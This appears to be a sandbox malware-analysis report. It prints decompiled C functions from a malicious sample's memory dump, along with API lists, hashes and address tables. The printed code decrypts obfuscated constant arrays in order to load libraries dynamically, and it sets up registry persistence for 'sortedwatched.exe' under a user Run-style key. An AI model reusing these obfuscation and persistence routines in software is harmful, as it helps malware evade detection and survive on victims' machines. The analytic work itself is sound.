				_v124 = 0x6a478088;
				_v120 = 0x5dc95d88;
				_v116 = 0x7073454d;
				_v112 = 0xacd929e4;
				_v108 = 0xde22b221;
				_v104 = 0x16e6327;
				_v100 = 0x9149dc8;
				_v96 = 0xe2880d33;
				_v92 = 0x2b179b1c;
				_v88 = 0xdea65404;
				_v84 = 0xf8875bcd;
				_v80 = 0x4b33baa9;
				_v76 = 0xb8f51a63;
				_v72 = 0x100f3977;
				_v68 = 0x86e5080f;
				_v64 = 0x39c92f99;
				_v60 = 0xd5b96d4e;
				_v56 = 0x4c99974;
				_v52 = 0x32225531;
				_v48 = 0xe94abe7a;
				_v44 = 0x45a4729;
				_v40 = 0xe5478378;
				_v36 = 0x67de8f40;
				_v32 = 0x9ef8aa84;
				_v28 = 0xb07d4bc5;
				_v24 = 0xa2696d4;
				_v20 = 0x57bd9265;
				_v16 = 0x5cb55045;
				_v12 = 0x686aeb99;
				_v8 = 0xd8fb779c;
				_t367 = E00401A52(0x412830, 0x72fc3a35);
				 *0x416500 = LoadLibraryW(_t358);
				L00401B09(_t367);
				_push(0x415f50);
				_push(0x15bf801c);
				return E004012FF( *0x416500,  &_v1428, 0x164);
			}







































































































































































































































































































































































                  0x0040b6bf
                  0x0040b6c9
                  0x0040b6d3
                  0x0040b6dd
                  0x0040b6e7
                  0x0040b6f1
                  0x0040b6fb
                  0x0040b705
                  0x0040b70f
                  0x0040b719
                  0x0040b723
                  0x0040b72d
                  0x0040b737
                  0x0040b741
                  0x0040b74b
                  0x0040b755
                  0x0040b75f
                  0x0040b769
                  0x0040b773
                  0x0040b77d
                  0x0040b787
                  0x0040b791
                  0x0040b79b
                  0x0040b7a5
                  0x0040b7af
                  0x0040b7b9
                  0x0040b7c3
                  0x0040b7cd
                  0x0040b7d7
                  0x0040b7e1
                  0x0040b7eb
                  0x0040b7f5
                  0x0040b7ff
                  0x0040b809
                  0x0040b813
                  0x0040b81d
                  0x0040b827
                  0x0040b831
                  0x0040b83b
                  0x0040b845
                  0x0040b84f
                  0x0040b859
                  0x0040b863
                  0x0040b86d
                  0x0040b877
                  0x0040b881
                  0x0040b88b
                  0x0040b895
                  0x0040b89f
                  0x0040b8a9
                  0x0040b8b3
                  0x0040b8bd
                  0x0040b8c7
                  0x0040b8d1
                  0x0040b8db
                  0x0040b8e5
                  0x0040b8ef
                  0x0040b8f9
                  0x0040b903
                  0x0040b90d
                  0x0040b917
                  0x0040b921
                  0x0040b92b
                  0x0040b935
                  0x0040b93f
                  0x0040b949
                  0x0040b953
                  0x0040b95d
                  0x0040b967
                  0x0040b971
                  0x0040b97b
                  0x0040b985
                  0x0040b98f
                  0x0040b999
                  0x0040b9a3
                  0x0040b9ad
                  0x0040b9b7
                  0x0040b9c1
                  0x0040b9cb
                  0x0040b9d5
                  0x0040b9df
                  0x0040b9e9
                  0x0040b9f3
                  0x0040b9fd
                  0x0040ba07
                  0x0040ba11
                  0x0040ba1b
                  0x0040ba25
                  0x0040ba2f
                  0x0040ba39
                  0x0040ba43
                  0x0040ba4d
                  0x0040ba57
                  0x0040ba61
                  0x0040ba6b
                  0x0040ba75
                  0x0040ba7f
                  0x0040ba89
                  0x0040ba93
                  0x0040ba9d
                  0x0040baa7
                  0x0040bab1
                  0x0040babb
                  0x0040bac5
                  0x0040bacf
                  0x0040bad9
                  0x0040bae3
                  0x0040baed
                  0x0040baf7
                  0x0040bb01
                  0x0040bb0b
                  0x0040bb15
                  0x0040bb1f
                  0x0040bb29
                  0x0040bb33
                  0x0040bb3d
                  0x0040bb47
                  0x0040bb51
                  0x0040bb5b
                  0x0040bb65
                  0x0040bb6f
                  0x0040bb79
                  0x0040bb83
                  0x0040bb8d
                  0x0040bb97
                  0x0040bba1
                  0x0040bbab
                  0x0040bbb5
                  0x0040bbbf
                  0x0040bbc9
                  0x0040bbd3
                  0x0040bbdd
                  0x0040bbe7
                  0x0040bbf1
                  0x0040bbfb
                  0x0040bc05
                  0x0040bc0f
                  0x0040bc19
                  0x0040bc23
                  0x0040bc2d
                  0x0040bc37
                  0x0040bc41
                  0x0040bc4b
                  0x0040bc55
                  0x0040bc5f
                  0x0040bc69
                  0x0040bc73
                  0x0040bc7d
                  0x0040bc87
                  0x0040bc91
                  0x0040bc9b
                  0x0040bca5
                  0x0040bcaf
                  0x0040bcb9
                  0x0040bcc3
                  0x0040bccd
                  0x0040bcd7
                  0x0040bce1
                  0x0040bceb
                  0x0040bcf5
                  0x0040bcff
                  0x0040bd09
                  0x0040bd13
                  0x0040bd1d
                  0x0040bd27
                  0x0040bd31
                  0x0040bd3b
                  0x0040bd45
                  0x0040bd4f
                  0x0040bd59
                  0x0040bd63
                  0x0040bd6d
                  0x0040bd77
                  0x0040bd81
                  0x0040bd8b
                  0x0040bd95
                  0x0040bd9f
                  0x0040bda9
                  0x0040bdb3
                  0x0040bdbd
                  0x0040bdc7
                  0x0040bdd1
                  0x0040bddb
                  0x0040bde5
                  0x0040bdef
                  0x0040bdf9
                  0x0040be03
                  0x0040be0d
                  0x0040be17
                  0x0040be21
                  0x0040be2b
                  0x0040be35
                  0x0040be3f
                  0x0040be49
                  0x0040be53
                  0x0040be5d
                  0x0040be67
                  0x0040be71
                  0x0040be7b
                  0x0040be85
                  0x0040be8f
                  0x0040be99
                  0x0040bea3
                  0x0040bead
                  0x0040beb7
                  0x0040bec1
                  0x0040becb
                  0x0040bed5
                  0x0040bedf
                  0x0040bee9
                  0x0040bef3
                  0x0040befd
                  0x0040bf07
                  0x0040bf11
                  0x0040bf1b
                  0x0040bf25
                  0x0040bf2f
                  0x0040bf39
                  0x0040bf43
                  0x0040bf4d
                  0x0040bf57
                  0x0040bf61
                  0x0040bf6b
                  0x0040bf75
                  0x0040bf7f
                  0x0040bf89
                  0x0040bf93
                  0x0040bf9d
                  0x0040bfa7
                  0x0040bfb1
                  0x0040bfbb
                  0x0040bfc5
                  0x0040bfcf
                  0x0040bfd9
                  0x0040bfe3
                  0x0040bfed
                  0x0040bff7
                  0x0040c001
                  0x0040c00b
                  0x0040c015
                  0x0040c01f
                  0x0040c029
                  0x0040c033
                  0x0040c03d
                  0x0040c047
                  0x0040c051
                  0x0040c05b
                  0x0040c065
                  0x0040c06f
                  0x0040c079
                  0x0040c083
                  0x0040c08d
                  0x0040c097
                  0x0040c0a1
                  0x0040c0ab
                  0x0040c0b5
                  0x0040c0bf
                  0x0040c0c9
                  0x0040c0d3
                  0x0040c0dd
                  0x0040c0e7
                  0x0040c0f1
                  0x0040c0fb
                  0x0040c105
                  0x0040c10f
                  0x0040c119
                  0x0040c123
                  0x0040c12d
                  0x0040c137
                  0x0040c141
                  0x0040c14b
                  0x0040c155
                  0x0040c15f
                  0x0040c169
                  0x0040c173
                  0x0040c17d
                  0x0040c187
                  0x0040c191
                  0x0040c19b
                  0x0040c1a5
                  0x0040c1af
                  0x0040c1b9
                  0x0040c1c3
                  0x0040c1cd
                  0x0040c1d7
                  0x0040c1e1
                  0x0040c1eb
                  0x0040c1f5
                  0x0040c1ff
                  0x0040c209
                  0x0040c213
                  0x0040c21d
                  0x0040c227
                  0x0040c231
                  0x0040c23b
                  0x0040c245
                  0x0040c24f
                  0x0040c259
                  0x0040c263
                  0x0040c26d
                  0x0040c277
                  0x0040c281
                  0x0040c28b
                  0x0040c295
                  0x0040c29f
                  0x0040c2a9
                  0x0040c2b3
                  0x0040c2bd
                  0x0040c2c7
                  0x0040c2d1
                  0x0040c2db
                  0x0040c2e5
                  0x0040c2ef
                  0x0040c2f9
                  0x0040c303
                  0x0040c30d
                  0x0040c317
                  0x0040c321
                  0x0040c32b
                  0x0040c335
                  0x0040c33f
                  0x0040c349
                  0x0040c353
                  0x0040c362
                  0x0040c371
                  0x0040c378
                  0x0040c37f
                  0x0040c386
                  0x0040c38d
                  0x0040c394
                  0x0040c39b
                  0x0040c3a2
                  0x0040c3a9
                  0x0040c3b0
                  0x0040c3b7
                  0x0040c3be
                  0x0040c3c5
                  0x0040c3cc
                  0x0040c3d3
                  0x0040c3da
                  0x0040c3e1
                  0x0040c3e8
                  0x0040c3ef
                  0x0040c3f6
                  0x0040c3fd
                  0x0040c404
                  0x0040c40b
                  0x0040c412
                  0x0040c419
                  0x0040c420
                  0x0040c427
                  0x0040c42e
                  0x0040c435
                  0x0040c43c
                  0x0040c443
                  0x0040c44a
                  0x0040c456
                  0x0040c461
                  0x0040c466
                  0x0040c477
                  0x0040c47c
                  0x0040c492

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0040C459
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: IU$$Q3$0BtG$1U"2$3*l$8$:Wk$<I=$J#Z$K87?$MEsp$Mj8!$S!Ch$[-Lo$`:)b$w=tO
                  • API String ID: 1029625771-1041004230
                  • Opcode ID: a6161a9d4aafef99e67fba5a3ea7ffe1bb0866b570629b60a20c1477af4adfba
                  • Instruction ID: 9a6b7aac7a66a4a18d8d0bcd4942d35e4a44c5d677b151ec7ad78da889033333
                  • Opcode Fuzzy Hash: a6161a9d4aafef99e67fba5a3ea7ffe1bb0866b570629b60a20c1477af4adfba
                  • Instruction Fuzzy Hash: FD52A5F48567698BDB618F459E897CEBA74BB11304FA096C8C25D3B214CB740BC6CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00409BFD, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 199libraryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E00409BFD(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				char _v704;

				_v704 = 0xf893fe23;
				_v700 = 0x96a93579;
				_v696 = 0x245c2aae;
				_v692 = 0xf26b8a8f;
				_v688 = 0x14c1b027;
				_v684 = 0xe0f0703e;
				_v680 = 0x88b3d872;
				_v676 = 0xa84285a9;
				_v672 = 0x47a43a6c;
				_v668 = 0xf852e92a;
				_v664 = 0xe5dfba2e;
				_v660 = 0xd7c59fdb;
				_v656 = 0xc3cbda99;
				_v652 = 0xcb41f718;
				_v648 = 0x6a64f5c4;
				_v644 = 0xdedf71d9;
				_v640 = 0xc4de6aec;
				_v636 = 0xfadcabb3;
				_v632 = 0x51f000a9;
				_v628 = 0x9adea939;
				_v624 = 0xb06b7dbe;
				_v620 = 0x2357ceb6;
				_v616 = 0x35749835;
				_v612 = 0x24a62c8;
				_v608 = 0x5593220e;
				_v604 = 0x3bac3701;
				_v600 = 0x3ed279c7;
				_v596 = 0xc38eec75;
				_v592 = 0xaa787b27;
				_v588 = 0xe66cbef7;
				_v584 = 0x3eba0d2d;
				_v580 = 0x80721929;
				_v576 = 0x647cf0de;
				_v572 = 0x6b060840;
				_v568 = 0xdb744423;
				_v564 = 0x56120815;
				_v560 = 0x16cc448e;
				_v556 = 0xaf1d3a70;
				_v552 = 0x84afcece;
				_v548 = 0x1f5b2bac;
				_v544 = 0x84987065;
				_v540 = 0x923c41c0;
				_v536 = 0x62b2d1f2;
				_v532 = 0x96e98167;
				_v528 = 0x6b9c643e;
				_v524 = 0x3bf32bb7;
				_v520 = 0x926b56ed;
				_v516 = 0xb2212760;
				_v512 = 0x3029804a;
				_v508 = 0x17afbdc1;
				_v504 = 0xe5215b81;
				_v500 = 0xa9a73174;
				_v496 = 0x38362969;
				_v492 = 0x2014a2e5;
				_v488 = 0x9bd1543c;
				_v484 = 0x9f02550a;
				_v480 = 0x70771f01;
				_v476 = 0xf57f7493;
				_v472 = 0xc2432019;
				_v468 = 0xfbc35934;
				_v464 = 0x7eef6c55;
				_v460 = 0xe5a1e850;
				_v456 = 0x95e16117;
				_v452 = 0x24148e16;
				_v448 = 0x7e86f567;
				_v444 = 0xd337dcd3;
				_v440 = 0xf1e0035b;
				_v436 = 0x7c2fa058;
				_v432 = 0xf68afb41;
				_v428 = 0xe89fcfb5;
				_v424 = 0x58132f2e;
				_v420 = 0xeb09708a;
				_v416 = 0x5042b9f5;
				_v412 = 0xa93c3553;
				_v408 = 0x5a85ccd8;
				_v404 = 0xad4d5cb9;
				_v400 = 0x72223e4b;
				_v396 = 0xa39693a8;
				_v392 = 0xef1aadfd;
				_v388 = 0x6cbdb06a;
				_v384 = 0xd7d937f8;
				_v380 = 0x596db643;
				_v376 = 0x230ce0c7;
				_v372 = 0x2d4bd8be;
				_v368 = 0xb37400f3;
				_v364 = 0x76b2403b;
				_v360 = 0xe15bf8ce;
				_v356 = 0xfc854871;
				_v352 = 0x6777c410;
				_v348 = 0xa6813d08;
				_v344 = 0x61441dae;
				_v340 = 0x7bc73fac;
				_v336 = 0xa81f123a;
				_v332 = 0x2f60e4b5;
				_v328 = 0x4165078e;
				_v324 = 0x81b3b60d;
				_v320 = 0x2f424b6a;
				_v316 = 0xe18acee1;
				_v312 = 0x40cb9f46;
				_v308 = 0xdcd07e81;
				_v304 = 0x77d948c4;
				_v300 = 0x8a50f65;
				_v296 = 0x69aaae5c;
				_v292 = 0x9aa1a84c;
				_v288 = 0x1177fe62;
				_v284 = 0x215e105a;
				_v280 = 0x568272bb;
				_v276 = 0x5f8f9ba2;
				_v272 = 0xae54d071;
				_v268 = 0x6814f89b;
				_v264 = 0x256969df;
				_v260 = 0x40871313;
				_v256 = 0x6ce1575a;
				_v252 = 0xbd3d788c;
				_v248 = 0x7ca8f87d;
				_v244 = 0x85fa53e6;
				_v240 = 0xd148325c;
				_v236 = 0x5e7ec80d;
				_v232 = 0xfdf502b7;
				_v228 = 0x2c986a2a;
				_v224 = 0xddbf220;
				_v220 = 0x4615f74b;
				_v216 = 0x5ca4c89f;
				_v212 = 0x146daa39;
				_v208 = 0xc823a9eb;
				_v204 = 0x367ea921;
				_v200 = 0xa498042b;
				_v196 = 0xca2acd0c;
				_v192 = 0xcac29f8f;
				_v188 = 0x581c0af8;
				_v184 = 0x54e383ca;
				_v180 = 0xe1d640da;
				_v176 = 0x26176d9b;
				_v172 = 0x44ba6c41;
				_v168 = 0xc7a769a8;
				_v164 = 0x14207816;
				_v160 = 0x60a483b3;
				_v156 = 0x2ec84207;
				_v152 = 0x55861a6c;
				_v148 = 0x9395ac55;
				_v144 = 0x7b3d468b;
				_v140 = 0xd742a34c;
				_v136 = 0xba1c8499;
				_v132 = 0xeedaef98;
				_v128 = 0x6fb05dd;
				_v124 = 0x51e8e4bc;
				_v120 = 0x78b88ff1;
				_v116 = 0xbd2f7124;
				_v112 = 0x56393da7;
				_v108 = 0xfe67bd5c;
				_v104 = 0x6bdb93e9;
				_v100 = 0xcd10dc31;
				_v96 = 0x10fa8214;
				_v92 = 0x66a75e2c;
				_v88 = 0xd4e5c57c;
				_v84 = 0xd9860dbd;
				_v80 = 0x6c05994b;
				_v76 = 0x3a6c9168;
				_v72 = 0x3ac0a209;
				_v68 = 0xeded3b06;
				_v64 = 0xc4e5c3d3;
				_v60 = 0x7666b774;
				_v56 = 0x18554a2e;
				_v52 = 0x9ba375a9;
				_v48 = 0x4225f3c7;
				_v44 = 0x59ee853;
				_v40 = 0xbef69b19;
				_v36 = 0x369b917b;
				_v32 = 0x5d702853;
				_v28 = 0x77e322b0;
				_v24 = 0x283b69ec;
				_v20 = 0x1e83f9c3;
				_v16 = 0xacacd89d;
				_v12 = 0x5dd1b9f2;
				_v8 = 0xedfd234e;
				_t186 = E00401A52(0x412360, 0x72fc3a35);
				 *0x4164f8 = LoadLibraryW(_t177);
				L00401B09(_t186);
				_push(0x415490);
				_push(0x6ae14ef1);
				return E004012FF( *0x4164f8,  &_v704, 0xaf);
			}


















































































































































































                  0x00409c07
                  0x00409c11
                  0x00409c1b
                  0x00409c25
                  0x00409c2f
                  0x00409c39
                  0x00409c43
                  0x00409c4d
                  0x00409c57
                  0x00409c61
                  0x00409c6b
                  0x00409c75
                  0x00409c7f
                  0x00409c89
                  0x00409c93
                  0x00409c9d
                  0x00409ca7
                  0x00409cb1
                  0x00409cbb
                  0x00409cc5
                  0x00409ccf
                  0x00409cd9
                  0x00409ce3
                  0x00409ced
                  0x00409cf7
                  0x00409d01
                  0x00409d0b
                  0x00409d15
                  0x00409d1f
                  0x00409d29
                  0x00409d33
                  0x00409d3d
                  0x00409d47
                  0x00409d51
                  0x00409d5b
                  0x00409d65
                  0x00409d6f
                  0x00409d79
                  0x00409d83
                  0x00409d8d
                  0x00409d97
                  0x00409da1
                  0x00409dab
                  0x00409db5
                  0x00409dbf
                  0x00409dc9
                  0x00409dd3
                  0x00409ddd
                  0x00409de7
                  0x00409df1
                  0x00409dfb
                  0x00409e05
                  0x00409e0f
                  0x00409e19
                  0x00409e23
                  0x00409e2d
                  0x00409e37
                  0x00409e41
                  0x00409e4b
                  0x00409e55
                  0x00409e5f
                  0x00409e69
                  0x00409e73
                  0x00409e7d
                  0x00409e87
                  0x00409e91
                  0x00409e9b
                  0x00409ea5
                  0x00409eaf
                  0x00409eb9
                  0x00409ec3
                  0x00409ecd
                  0x00409ed7
                  0x00409ee1
                  0x00409eeb
                  0x00409ef5
                  0x00409eff
                  0x00409f09
                  0x00409f13
                  0x00409f1d
                  0x00409f27
                  0x00409f31
                  0x00409f3b
                  0x00409f45
                  0x00409f4f
                  0x00409f59
                  0x00409f63
                  0x00409f6d
                  0x00409f77
                  0x00409f81
                  0x00409f8b
                  0x00409f95
                  0x00409f9f
                  0x00409fa9
                  0x00409fb3
                  0x00409fbd
                  0x00409fc7
                  0x00409fd1
                  0x00409fdb
                  0x00409fe5
                  0x00409fef
                  0x00409ff9
                  0x0040a003
                  0x0040a00d
                  0x0040a017
                  0x0040a021
                  0x0040a02b
                  0x0040a035
                  0x0040a03f
                  0x0040a049
                  0x0040a053
                  0x0040a05d
                  0x0040a067
                  0x0040a071
                  0x0040a07b
                  0x0040a085
                  0x0040a08f
                  0x0040a099
                  0x0040a0a3
                  0x0040a0ad
                  0x0040a0b7
                  0x0040a0c1
                  0x0040a0cb
                  0x0040a0d5
                  0x0040a0df
                  0x0040a0e9
                  0x0040a0f3
                  0x0040a0fd
                  0x0040a107
                  0x0040a111
                  0x0040a11b
                  0x0040a125
                  0x0040a12f
                  0x0040a139
                  0x0040a143
                  0x0040a14d
                  0x0040a157
                  0x0040a161
                  0x0040a16b
                  0x0040a175
                  0x0040a17f
                  0x0040a189
                  0x0040a193
                  0x0040a19d
                  0x0040a1a4
                  0x0040a1ab
                  0x0040a1b2
                  0x0040a1b9
                  0x0040a1c0
                  0x0040a1c7
                  0x0040a1ce
                  0x0040a1d5
                  0x0040a1dc
                  0x0040a1e3
                  0x0040a1ea
                  0x0040a1f1
                  0x0040a1f8
                  0x0040a1ff
                  0x0040a206
                  0x0040a20d
                  0x0040a214
                  0x0040a220
                  0x0040a22c
                  0x0040a233
                  0x0040a23a
                  0x0040a241
                  0x0040a248
                  0x0040a24f
                  0x0040a256
                  0x0040a25d
                  0x0040a264
                  0x0040a26b
                  0x0040a272
                  0x0040a279
                  0x0040a280
                  0x0040a28c
                  0x0040a297
                  0x0040a29c
                  0x0040a2ad
                  0x0040a2b2
                  0x0040a2c8

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0040A28F
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: K>"r$S(p]$Ul~$ZWl$i)68$jKB/$i;(
                  • API String ID: 1029625771-3790624641
                  • Opcode ID: 0a649403d8d360f2a31862833572a2dea479a68f40ac8d43144fbebdc44cd8d9
                  • Instruction ID: 14f22b25c2d513f9b0b165bc48c778ba0d1b191eebadfcd767fb7a1b2c45f88c
                  • Opcode Fuzzy Hash: 0a649403d8d360f2a31862833572a2dea479a68f40ac8d43144fbebdc44cd8d9
                  • Instruction Fuzzy Hash: 3FE196B4C06369CFDB618F86AA897CDBB70BB01704F6082C9C5993B215CB755AC6CF85
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F9DF, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62registryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 84%
                  			E0040F9DF() {
				void* _v8;
				char _v528;
				void* _t8;
				void* _t12;
				void* _t20;
				void* _t30;
				signed int _t31;
				void* _t33;

				if( *0x415f4c == 0) {
					_t34 = E00401A52(0x4129d0, 0x4bf67e71);
					_t31 =  *0x4143a4( &_v528, 0x104, _t9, "C:\Windows\system32\sortedwatched.exe", _t30, _t33, _t20);
					_t12 = L00401B09(_t34);
					if(_t31 > 0) {
						_t36 = E00401A52(0x412be0, 0x4bf67e71);
						if(RegCreateKeyExW(0x80000001, _t13, 0, 0, 0, 2, 0,  &_v8, 0) == 0) {
							RegSetValueExW(_v8, "sortedwatched", 0, 1,  &_v528, 2 + _t31 * 2);
							RegCloseKey(_v8);
						}
						_t12 = L00401B09(_t36);
					}
					return _t12;
				}
				return _t8;
			}











                  0x0040f9ef
                  0x0040fa09
                  0x0040fa28
                  0x0040fa2a
                  0x0040fa31
                  0x0040fa41
                  0x0040fa5c
                  0x0040fa78
                  0x0040fa81
                  0x0040fa81
                  0x0040fa89
                  0x0040fa89
                  0x00000000
                  0x0040fa90
                  0x0040fa94

                  APIs
                  • _snwprintf.NTDLL ref: 0040FA1D
                  • RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000002,00000000,0040C715,00000000), ref: 0040FA54
                  • RegSetValueExW.ADVAPI32(0040C715,sortedwatched,00000000,00000001,?,00000000), ref: 0040FA78
                  • RegCloseKey.ADVAPI32(0040C715), ref: 0040FA81
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCreateValue_snwprintf
                  • String ID: C:\Windows\system32\sortedwatched.exe$g8Cw$sortedwatched
                  • API String ID: 1044119080-1568575355
                  • Opcode ID: 60bf88f92e863372fde177faa1f2e9ee41820f5811c66e19c34b9d099638a4c2
                  • Instruction ID: ae6d8057d6044da2fd1c6008afec86d0aa78eac3dd708c417e1b6433d3ba4775
                  • Opcode Fuzzy Hash: 60bf88f92e863372fde177faa1f2e9ee41820f5811c66e19c34b9d099638a4c2
                  • Instruction Fuzzy Hash: D211CC71700208BFD710AB959D85FEB776DDB44785F10407BF909E3191EB749D448AA8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040FB72, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 87%
                  			E0040FB72(intOrPtr* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				void* _v20;
				void* _v24;
				char _v544;
				char _v1064;
				void* _t16;
				void* _t39;

				_v8 = _v8 & 0x00000000;
				E0040FAA1( &_v544);
				_t16 = E0040F8E6( &_v544,  *__ecx,  *((intOrPtr*)(__ecx + 4)));
				if(_t16 != 0) {
					_t16 = E00401DCB( &_v8);
					if(_t16 != 0) {
						_t39 = E00401A52(0x412e50, 0x55009ce0);
						 *0x4143a4( &_v1064, 0x104, _t39,  &_v544);
						_t33 = _t39;
						L00401B09(_t39);
						if(E00401D2B( &_v1064, _t33, _v8,  &_v24) != 0) {
							CloseHandle(_v24);
							CloseHandle(_v20);
						}
						return CloseHandle(_v8);
					}
				}
				return _t16;
			}










                  0x0040fb7b
                  0x0040fb88
                  0x0040fb98
                  0x0040fba0
                  0x0040fba5
                  0x0040fbac
                  0x0040fbbd
                  0x0040fbd3
                  0x0040fbdc
                  0x0040fbde
                  0x0040fbfb
                  0x0040fc00
                  0x0040fc09
                  0x0040fc09
                  0x00000000
                  0x0040fc12
                  0x0040fbac
                  0x0040fc1c

                  APIs
                    • Part of subcall function 0040FAA1: lstrlenW.KERNEL32(?), ref: 0040FAB5
                    • Part of subcall function 0040FAA1: GetTickCount.KERNEL32 ref: 0040FAC5
                    • Part of subcall function 0040F8E6: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040F900
                    • Part of subcall function 0040F8E6: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040F917
                    • Part of subcall function 0040F8E6: CloseHandle.KERNEL32(00000000), ref: 0040F920
                    • Part of subcall function 00401DCB: WTSGetActiveConsoleSessionId.KERNEL32 ref: 00401DD6
                    • Part of subcall function 00401DCB: CloseHandle.KERNEL32(00000000), ref: 00401DF6
                  • _snwprintf.NTDLL ref: 0040FBD3
                  • CloseHandle.KERNEL32(?), ref: 0040FC00
                  • CloseHandle.KERNEL32(?), ref: 0040FC09
                  • CloseHandle.KERNEL32(00000000), ref: 0040FC12
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$File$ActiveConsoleCountCreateSessionTickWrite_snwprintflstrlen
                  • String ID: g8Cw
